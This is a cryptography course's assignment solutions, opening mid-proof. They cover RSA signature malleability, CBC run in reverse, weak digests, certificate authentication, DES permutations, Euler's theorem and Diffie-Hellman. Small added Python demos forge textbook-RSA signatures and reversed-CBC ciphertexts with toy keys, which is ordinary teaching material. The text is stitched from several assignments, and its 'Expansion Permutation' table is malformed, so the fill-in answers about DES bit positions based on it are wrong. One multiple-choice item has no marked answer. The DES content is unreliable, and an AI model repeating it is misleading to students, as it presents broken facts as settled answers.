$$\Pr[C = c \mid M = m] = \Pr[\mathrm{Enc}_K(m) = c] = \Pr[m \oplus K = c] = \Pr[K = m \oplus c] = 2^{-\theta}$$

since the key length is θ and keys are uniformly distributed.

Then, for any c in ciphertext space C, we have

$$\Pr[C = c] = \sum_{m' \in M} \Pr[C = c \mid M = m'] \cdot \Pr[M = m'] = \sum_{m' \in M} 2^{-\theta} \cdot \Pr[M = m'] = 2^{-\theta}$$

Finally, we prove that for any c in ciphertext space C and any m in message space M

$$\Pr[M = m \mid C = c] = \frac{\Pr[C = c \mid M = m] \cdot \Pr[M = m]}{\Pr[C = c]} = \frac{2^{-\theta} \cdot \Pr[M = m]}{2^{-\theta}} = \Pr[M = m]$$

CIS 4520 Introduction to Cryptography, Winter 2024
Assignment 2 Solution

Instructor: Dr. Wenjing Zhang

Due Date: February 26, 2024 (Monday), 11:59pm.


Format: For Problem 1-5, please type your solutions and submit a pdf of your solutions in CourseLink
(The file should be named “Lastname Firstname A2 Solutions.pdf”.). For Problem 6, please submit a zip
file of your code in CourseLink (The file should be named “Lastname Firstname A2 Code.zip”.).
Total Points: 10 points

Problem 1 (1 point). Suppose Alex sees your RSA signature on $m_1$ and on $m_2$ (i.e. he sees $m_1^d \bmod n$ and $m_2^d \bmod n$). How does he compute the signature on each of these messages: $m_1^j \bmod n$ (for positive integer j), $m_1^{-1} \bmod n$, $m_1 \cdot m_2 \bmod n$, and in general $m_1^j \cdot m_2^k \bmod n$ (for arbitrary integers j and k)?

Solution: $(m_1^j)^d \bmod n = (m_1^d)^j \bmod n$, so to compute your signature on $m_1^j$, Alex just raises your signature on $m_1$ to the jth power, mod n.
$(m_1^{-1})^d \bmod n = (m_1^d)^{-1} \bmod n$, so to compute your signature on $m_1^{-1} \bmod n$, Alex just computes the inverse mod n of your signature on $m_1$.
$(m_1 \cdot m_2)^d \bmod n = m_1^d \cdot m_2^d \bmod n$, so to compute your signature on $m_1 \cdot m_2 \bmod n$, Alex just multiplies your signature on $m_1$ by your signature on $m_2$, mod n.
So for the general case of $m_1^j \cdot m_2^k \bmod n$, Alex gets your signature on $m_1^{\operatorname{sgn} j} \bmod n$ and raises it to the |j|th power, mod n, then gets your signature on $m_2^{\operatorname{sgn} k} \bmod n$ and raises it to the |k|th power, mod n, and finally multiplies the results together, mod n. [$\operatorname{sgn} x = x / |x|$]
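The multiplicative property worked through above, beside a hash-then-sign variant that does not have it, as an added Python example (not from the assignment); the primes, public exponent and sample messages are constructed toy values.

```python
"""Multiplicative property of textbook RSA signatures, and why hash-then-sign matters.

Added example for A2 Problem 1; not from the course materials.  The key parameters
are constructed toy values (two known primes), far too small for real use.
"""
import hashlib

P, Q = 104729, 1299709                      # constructed toy primes
N = P * Q
PHI = (P - 1) * (Q - 1)
E = 65537
D = pow(E, -1, PHI)                         # private exponent: E * D = 1 mod phi(N)


def sign_textbook(m):
    """sig = m^d mod n on the raw message, as in Problem 1."""
    return pow(m, D, N)


def verify_textbook(m, sig):
    return pow(sig, E, N) == m % N


def target_message(m1, m2, j, k):
    """m1^j * m2^k mod n for arbitrary integers j, k (negative => modular inverse)."""
    t1 = pow(m1 if j >= 0 else pow(m1, -1, N), abs(j), N)
    t2 = pow(m2 if k >= 0 else pow(m2, -1, N), abs(k), N)
    return t1 * t2 % N


def forge_product_signature(sig1, sig2, j, k):
    """Problem 1's observation: from sig(m1) and sig(m2) alone, the signature on
    m1^j * m2^k mod n is sig1^j * sig2^k mod n.  A negative exponent uses the
    modular inverse of the signature (sgn x = x / |x| in the solution's notation)."""
    base1 = sig1 if j >= 0 else pow(sig1, -1, N)
    base2 = sig2 if k >= 0 else pow(sig2, -1, N)
    return pow(base1, abs(j), N) * pow(base2, abs(k), N) % N


def h(m):
    """Toy message digest: SHA-256 of the message, reduced into Z_n."""
    return int.from_bytes(hashlib.sha256(str(m).encode()).digest(), "big") % N


def sign_hashed(m):
    """Hash-then-sign: sig = H(m)^d mod n.  H is not multiplicative, so
    sig(m1) * sig(m2) is not a valid signature on m1 * m2."""
    return pow(h(m), D, N)


def verify_hashed(m, sig):
    return pow(sig, E, N) == h(m)


if __name__ == "__main__":
    m1, m2 = 65, 123                              # constructed sample messages
    s1, s2 = sign_textbook(m1), sign_textbook(m2)
    for j, k in [(5, 0), (-1, 0), (1, 1), (3, -2)]:
        target = target_message(m1, m2, j, k)
        forged = forge_product_signature(s1, s2, j, k)
        print(j, k, verify_textbook(target, forged))           # True each time
    hs1, hs2 = sign_hashed(m1), sign_hashed(m2)
    print(verify_hashed(m1 * m2 % N, hs1 * hs2 % N))           # False
```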

Problem 2 (1 point). Consider the following alternative method of encrypting a message. To encrypt
a message, use the algorithm for doing a CBC decrypt. To decrypt a message, use the algorithm for doing
a CBC encrypt. Would this work? What are the security implications of this, if any, as contrasted with
the “normal” CBC?

Solution: Technically, this inversion is feasible because encryption and decryption are inverse opera-
tions. Encryption algorithms are designed to secure data, and decryption algorithms are designed to revert
encrypted data back to its original form, given the correct key. By reversing these roles, the process still
maintains a form of symmetry allowing for the retrieval of original data.
One problem with this is that if someone knows the plaintext and ciphertext for a set of messages,
he/she can mix and match the blocks of those messages almost as easily as with ECB. The reason is that
block n of plaintext XOR’d with block n+1 of ciphertext is D (output of Decrypt in the CBC mode) of
block n+1 of plaintext, and once the attacker knows D of a desired block of plaintext, he/she can XOR it
with the plaintext of the previous block to produce correct ciphertext.
More seriously, since block n+1 of ciphertext depends only on block n and n+1 of plaintext, patterns
of ciphertext blocks indicate patterns in the plaintext, which provides a big clue for cryptanalysis. And
if D of block n+1 of plaintext is known, it can be XOR’d with block n+1 of ciphertext to get block n of
plaintext.
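The reversed mode and the known-plaintext mix-and-match described in this solution, as an added Python example (not part of the assignment); the 16-bit affine block function and its key are constructed stand-ins for a real block cipher, since only the mode structure matters here.

```python
"""Using CBC decryption as the encryption direction (A2 Problem 2).

Added example, not from the course materials.  E/D form a constructed, invertible
16-bit affine toy "block cipher" with no security of its own.
"""
MASK = 0xFFFF
K_MUL, K_ADD = 0x9E37, 0x1234          # constructed toy key; K_MUL odd => invertible
K_MUL_INV = pow(K_MUL, -1, 1 << 16)


def E(x):
    """Toy block encryption."""
    return (x * K_MUL + K_ADD) & MASK


def D(y):
    """Toy block decryption, the inverse of E."""
    return ((y - K_ADD) * K_MUL_INV) & MASK


def reversed_cbc_encrypt(blocks, iv):
    """Run CBC *decryption* on the plaintext: C_i = D(P_i) XOR P_{i-1}, with P_0 = IV.
    Note C_i depends only on P_{i-1} and P_i, not on earlier blocks."""
    out, prev = [], iv
    for p in blocks:
        out.append(D(p) ^ prev)
        prev = p
    return out


def reversed_cbc_decrypt(blocks, iv):
    """Run CBC *encryption* on the ciphertext: P_i = E(C_i XOR P_{i-1}) = E(D(P_i))."""
    out, prev = [], iv
    for c in blocks:
        p = E(c ^ prev)
        out.append(p)
        prev = p
    return out


def forge_ciphertext(known_plain, known_cipher, new_plain, iv):
    """The solution's known-plaintext problem: D(P_i) = C_i XOR P_{i-1} is learned from
    any known (plaintext, ciphertext) pair, so a valid ciphertext for any rearrangement
    of already-seen blocks can be built without the key."""
    learned = {}                            # plaintext block -> D(block)
    prev = iv
    for p, c in zip(known_plain, known_cipher):
        learned[p] = c ^ prev
        prev = p
    out, prev = [], iv
    for p in new_plain:                      # every block must have been seen before
        out.append(learned[p] ^ prev)
        prev = p
    return out


if __name__ == "__main__":
    iv = 0xABCD                              # constructed IV
    plain = [0x1111, 0x2222, 0x3333, 0x1111]  # constructed plaintext blocks
    ct = reversed_cbc_encrypt(plain, iv)
    print(reversed_cbc_decrypt(ct, iv) == plain)                       # True
    new = [0x3333, 0x1111, 0x2222, 0x3333]
    print(forge_ciphertext(plain, ct, new, iv) == reversed_cbc_encrypt(new, iv))  # True
    # Pattern leakage: equal (P_{i-1}, P_i) pairs give equal C_i at any position.
    pat = reversed_cbc_encrypt([0x1111, 0x2222, 0x1111, 0x2222], iv)
    print(pat[1] == pat[3])                                            # True
```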

Problem 3 (0.5 points). Message digests are reasonably fast, but here’s a much faster function to
compute. Take your message, divide it into 128-bit chunks, and XOR (⊕) all the chunks together to get a
128-bit result. Then do the standard message digest on the result. Is this a good message digest function?

Solution: No. It is fairly easy to generate another message with the same 128-bit result. For example,
flipping one bit in the first block and flip the same bit in the second block. (thus result in a collision)

Problem 4 (1 point). Find and give the following information for any real-world certificate of your
choice. You can choose your bank, email, web browser, or any other system.
a. Subject name (including domain name).
b. Expiration date.
c. First 16 bytes of public key.
d. Certificate Authority name.
e. Type of encryption used for signature.
f. Give a step-by-step process that enables the browser to validate the certificate.
g. Indicate whether it is an intermediate CA’s certificate or trusted root CA’s certificate.

Solution: Please refer to pages 10-14 in the lecture notes, available in the 05 Authentication.pdf file,
under the Course Lecture Notes module on CourseLink.

Problem 5 (1.5 points). Assume that a message m is sent from Alice to Bob in the following form to achieve authentication:

$\mathrm{sig}_{sk_A}(m),\ pk_A,\ ID_A$

(1) Is there anything wrong with the above? That is, does it authenticate both message m and Alice? Identify the problems and propose to fix them, and write down the correct set of messages Alice should send.

Solution: There are (at least) two problems: (a) message m is not transmitted so the signature cannot be verified; (b) Alice’s public key is not authenticated since an attacker may change it during transmission.
One can also say that it is vulnerable to replay attack since there’s no timestamp.

To fix, transmit: $m,\ \mathrm{sig}_{sk_A}(m),\ pk_A,\ ID_A,\ cert = \mathrm{sig}_{sk_{CA}}(pk_A, ID_A)$ (one can also add a timestamp in the message and sign it).

(2) Describe the steps applied by Bob to verify the identity of Alice and the authenticity of m.

Solution: Assume that Bob is already preloaded with CA’s public key, Bob can first verify CA’s
certificate using its public key, then verify Alice’s signature on the message using Alice’s public key.
CIS 4520 Introduction to Cryptography, Winter 2024
Assignment 3 Solution

Instructor: Dr. Wenjing Zhang

Total Points: 10 points

Problem 1 (1 point). True or False Questions.

(1) (T/F) In Vigenere cipher, if we use a very long randomly generated letter sequence (say, 1 million long) as the keyword (which remains the same no matter how long a plaintext you have), then it is equivalent to the one-time pad cipher. False
(2) (T/F) Suppose that someone suggests the following way to confirm that two parties A, B are in
possession of the same secret key K. Party A creates a random bit string equal to the length of K,
XORs it with K, and sends the result over a public channel. Party B XORs the incoming message with
the same key K and sends the result back to A. Party A checks if what was received is the original
random string, and hence verifies that B is in possession of K. This scheme is NO more secure than B
communicating K to A in plaintext. True
(3) (T/F) It is impossible for both public key encryption and digital signature schemes to achieve perfect
secrecy. True
(4) (T/F) The Authentication Header (AH) protocol does whatever the Encapsulating Security Payload
(ESP) protocol does, with additional functionality. False
(5) (T/F) Using a prepared statement to feed user input to an SQL query ensures that nothing the user
enters will be treated as an SQL command. True
(6) (T/F) Non-malicious program errors are always intended to harm the computer or its data. False
(7) (T/F) The penetrate and patch approach is considered a bad idea since it only fixes problems that are
known and often only addresses the symptoms rather than the root cause. True
(8) (T/F) Software security only involves making sure that code does what it’s supposed to do. False
(9) (T/F) Buffer overflows can lead to arbitrary code execution by attackers. True
(10) (T/F) The Heartbleed Bug was a result of a buffer over-read error in OpenSSL. True

Problem 2 (1 point). Multiple-Choice Questions. (For A3, full marks will be given if you choose at least
one correct answer. However, in the final exam, you must select ALL options that apply to get full marks.)

(1) Among the following modes of operation, which one has the least error propagation?
A. ECB (No error propagation)
B. CBC
C. CFB
D. OFB (No error propagation)
E. CTR (No error propagation)
(2) Given that user A has the key pair $(pk_a, sk_a)$, and user B has the key pair $(pk_b, sk_b)$, to ensure the confidentiality and integrity of a message m, the correct expression is:
A. $m \,\|\, \mathrm{Sig}_{sk_a}(H(m))$
B. $m \,\|\, ID_B \,\|\, \mathrm{Sig}_{sk_a}(H(m))$
C. $E_{pk_b}(m \,\|\, \mathrm{Sig}_{sk_a}(H(m)))$
D. $m \,\|\, \mathrm{Sig}_{sk_a}(H(m \,\|\, ID_B))$

(3) What does SSL/TLS provide for secure web communications?


A. Authentication only
B. Encryption only
C. Both authentication and encryption
D. Neither authentication nor encryption
(4) Which protocol is used for secure remote login service between two networked devices?
A. HTTP
B. DNS
C. SSH
D. SMTP
(5) “Mixing program control and user data” is a class of vulnerabilities where a program/application
accidentally treats user input as code and executes it. Which of the following attacks exploit this class
of vulnerabilities?
A. Buffer overflows
B. SQL Injection
C. Cross-site scripting (XSS)
D. None of these

Problem 3 (1 point). Fill-in-the-Blank Questions.

(1) If the Initial Permutation and Expansion Permutation of DES are as shown in Table 1 and 2, then for a plaintext block of 64 bits, the 1st, 9th, 17th, and 47th bits after permutation are located respectively at positions 40, 39, 38, 59, and for the right 32 bits of a round of DES encryption, the positions after the expansion permutation are 2 and 34 for the 1st bit and 29 for the 28th bit.

58 50 42 34 26 18 10 2
60 52 44 36 28 20 12 4
62 54 46 38 30 22 14 6
64 56 48 40 32 24 16 8
57 49 41 33 25 17 9 1
59 51 43 35 27 19 11 3
61 53 45 37 29 21 13 5
63 55 47 39 31 23 15 7
Table 1: Initial Permutation

32 1 2 3 4 5 6 7
8 9 10 11 12 13 14 15
16 17 18 19 20 21 22 23
24 25 26 27 28 29 30 31
32 1 2 3 4 5 6 7
Table 2: Expansion Permutation

(2) In the following signature process where A represents a trusted third party, the roles of the two $ID_X$ in message X → A are: the first $ID_X$ identifies the sender or transaction in plaintext, while the second $ID_X$ serves as a digital signature for authentication and non-repudiation purposes.

X → A : $ID_X \,\|\, E_{SK_X}[ID_X] \,\|\, E_{PK_Y}[E_{SK_X}[M]]$

A → Y : $E_{SK_A}[ID_X] \,\|\, E_{PK_Y}[E_{SK_X}[M]] \,\|\, T$

Problem 4 (2 points). Math.

(1) Compute the result of the following expression (show steps). (Hint: Use Euler’s totient theorem, which is $m^{\phi(n)} \equiv 1 \pmod n$.)

$$6425^{1082} \bmod 247$$

Solution:
Using Euler’s Totient Function:

$$\phi(247) = (13 - 1) \times (19 - 1) = 12 \times 18 = 216$$

Express the exponent as a multiple of ϕ(247) plus a remainder:

$$1082 = k \times 216 + r = 5 \times 216 + 2$$

Using Euler’s theorem for simplification, since 6425 and 247 are co-prime:

$$6425^{1082} \bmod 247 \equiv 6425^{r} \bmod 247 \equiv 6425^{2} \bmod 247 \equiv 9 \pmod{247}$$

(2) Let m > 1 be an integer, and let Dm denote the set {1, 2, . . . , m − 1}. Consider a symmetric (secret
key) encryption scheme for which the plaintext set is P = Dm , the encryption key K is randomly
chosen from Dm (with the restriction that K is relatively prime to m (K = 1 is considered relatively
prime as well)). And the ciphertext y is obtained by y = x · K mod m, where x is a plaintext message
(integer) from Dm . For m = 4, compute and fill in the following table with rows indexed by possible
messages and columns indexed by possible ciphertexts, with the entry in row i and column j being
the probability (over the random choice of K) that the encryption of i under any K yields j. (Hint:
first obtain the encryption table, where rows are indexed by possible messages and columns by possible
keys, and elements are the corresponding ciphertexts.)

Solution: m = 4, K = {1, 3}, $D_m$ = {1, 2, 3}, y = x · K mod m

Table 3: Hint: encryption table (rows: message x, columns: key K, entries: ciphertext)

x \ K | 1 | 3
1     | 1 | 3
2     | 2 | 2
3     | 3 | 1

Table 4: Table required to be filled in (rows: message X, columns: ciphertext Y, entries: probability over K)

X \ Y | 1   | 2 | 3
1     | 1/2 | 0 | 1/2
2     | 0   | 1 | 0
3     | 1/2 | 0 | 1/2
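An exact-probability check of the definitions used in A1 Problems 7 and 8 and in Table 4 above, as an added Python example (not from the assignments): it computes Pr[C = c | M = m] and Pr[C = c] over a uniformly chosen key and tests Pr[M = m | C = c] = Pr[M = m] for the shift cipher, the one-time pad and the multiplicative cipher mod 4; the skewed θ-bit message distribution is constructed.

```python
"""Exact ciphertext distributions and a perfect-secrecy check for small ciphers.

Added example for A1 Problems 7-8 and A3 Problem 4(2); not from the course materials.
Probabilities are exact Fractions so results can be compared with the solutions.
"""
from fractions import Fraction
from math import gcd


def cond_ciphertext_probs(encrypt, messages, keys):
    """Pr[C = c | M = m] for every reachable (m, c), with K uniform over keys."""
    table = {}
    p_key = Fraction(1, len(keys))
    for m in messages:
        for k in keys:
            c = encrypt(m, k)
            table[(m, c)] = table.get((m, c), 0) + p_key
    return table


def ciphertext_probs(encrypt, msg_dist, keys):
    """Pr[C = c] = sum over m of Pr[C = c | M = m] * Pr[M = m] (total probability)."""
    cond = cond_ciphertext_probs(encrypt, list(msg_dist), keys)
    dist = {}
    for (m, c), p in cond.items():
        dist[c] = dist.get(c, 0) + p * msg_dist[m]
    return dist


def is_perfectly_secret(encrypt, msg_dist, keys):
    """Bayes: Pr[M = m | C = c] = Pr[C = c | M = m] Pr[M = m] / Pr[C = c].  Returns True
    iff that posterior equals the prior Pr[M = m] for every m and every reachable c
    under this message distribution (a violation for one distribution refutes perfect
    secrecy; the definition quantifies over all distributions)."""
    cond = cond_ciphertext_probs(encrypt, list(msg_dist), keys)
    for c, p_c in ciphertext_probs(encrypt, msg_dist, keys).items():
        for m, p_m in msg_dist.items():
            if cond.get((m, c), 0) * p_m / p_c != p_m:
                return False
    return True


# A1 Problem 7: shift cipher on two-letter messages, key uniform in {0..25}.
def shift_encrypt(m, k):
    return "".join(chr((ord(ch) - ord("a") + k) % 26 + ord("A")) for ch in m)

SHIFT_KEYS = range(26)
SHIFT_DIST = {"aa": Fraction(3, 10), "ab": Fraction(4, 10), "bc": Fraction(3, 10)}


# A1 Problem 8: one-time pad on theta-bit strings, represented as integers.
def otp_encrypt(m, k):
    return m ^ k

def otp_keys(theta):
    return range(2 ** theta)

def skewed_dist(theta):
    """Constructed non-uniform message distribution: Pr[M = m] proportional to m + 1."""
    total = sum(range(1, 2 ** theta + 1))
    return {m: Fraction(m + 1, total) for m in range(2 ** theta)}


# A3 Problem 4(2): y = x * K mod m with K drawn from {1..m-1} coprime to m.
def mult_encrypt(x, k, m=4):
    return x * k % m

def mult_keys(m):
    return [k for k in range(1, m) if gcd(k, m) == 1]

def mult_messages(m):
    return list(range(1, m))


if __name__ == "__main__":
    print(ciphertext_probs(shift_encrypt, SHIFT_DIST, SHIFT_KEYS)["XY"])    # 7/260
    print(is_perfectly_secret(shift_encrypt, SHIFT_DIST, SHIFT_KEYS))       # False
    print(is_perfectly_secret(otp_encrypt, skewed_dist(3), otp_keys(3)))    # True
    print(cond_ciphertext_probs(mult_encrypt, mult_messages(4), mult_keys(4)))  # Table 4
```

Pr[C = XY] = 7/260 ≈ 0.0269 matches Problem 7, and the shift cipher fails the check because Pr[M = aa | C = XY] = 0 differs from Pr[M = aa] = 0.3.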

Problem 5 (4 points). Short-Answer Questions. (Apologies for some answers not being short! Full marks
will be given for reasonable answers.)

(1) Consider a Key Distribution Center (KDC):


(1.1) What are the advantage(s) of using a KDC rather than having every two principals in the system sharing a secret key?
(1.2) What secret information should be pre-configured in a KDC and in each principal?
(1.3) What information should be included in a ticket and how should a ticket be encrypted?
(1.4) Explain the process of Alice authenticating herself to Bob via the help of a KDC (assume they
are directly linked to a common KDC).
(2) In the process of Diffie-Hellman key exchange, user Sam can determine his public value S as:

$$S = a^{X_S} \bmod n$$

where $X_S < n$, n is a prime number, a is a primitive root of n and a < n. Assume Sam wants to exchange a secret, K, with user Fiona.
(2.1) What is the equation for Fiona to calculate her public value, F?
Solution: $F = a^{X_F} \bmod n$
(2.2) What value does Fiona send to Sam in the Diffie-Hellman exchange?
Solution: F
(2.3) What is the equation for Sam to calculate the secret, $K_S$?
Solution: $K_S = F^{X_S} \bmod n$
(2.4) What value(s) are public in this Diffie-Hellman exchange (that is, assumed that a malicious user knows them)?
Solution: a, n, F, S
(2.5) What value(s) should only be known by Fiona (that is, no other users should know them)?
Solution: $X_F$
(2.6) Prove that the secret calculated by Fiona, $K_F$, is the same as the secret calculated by Sam, $K_S$. Show the detailed steps of your proof.
Solution:

$$K_F = S^{X_F} \bmod n = \left(a^{X_S} \bmod n\right)^{X_F} \bmod n = \left(a^{X_S}\right)^{X_F} \bmod n = a^{X_S \cdot X_F} \bmod n$$

$$K_S = F^{X_S} \bmod n = \left(a^{X_F} \bmod n\right)^{X_S} \bmod n = \left(a^{X_F}\right)^{X_S} \bmod n = a^{X_F \cdot X_S} \bmod n$$

Therefore $K_F = K_S$.
(3) Explain how encryption helps in Network Security and why it does not solve all security problems. Give
an example.
(4) Intrusion Detection Systems (IDS).
(4.1) Describe the challenges and limitations of IDS in effectively detecting and mitigating modern-day
cyber threats. Include factors such as false positives, false negatives, and evasion techniques used by
attackers.
(4.2) Evaluate the role of Machine Learning and Artificial Intelligence techniques in enhancing the
capabilities of IDS. How can these technologies improve intrusion detection accuracy and efficiency?

Problem 6 (1 point). Discussions. (Full marks will be given for reasonable answers.)
In an intelligence agency, a desktop computer is infected by a Trojan horse, which records key strokes
and sends them to an overseas server via an encrypted TCP connection. The Trojan horse also exploits an
unknown operating system (OS) vulnerability and infects other computers in the local network.
Case 1: the firewall rules allow all outbound connections and deny all incoming connections.
Case 2: the firewall rules only allow incoming and outgoing connections of a few known services (HTTP,
FTP, SSH, etc).
For both cases, discuss whether the Trojan horse could be blocked by the firewall.
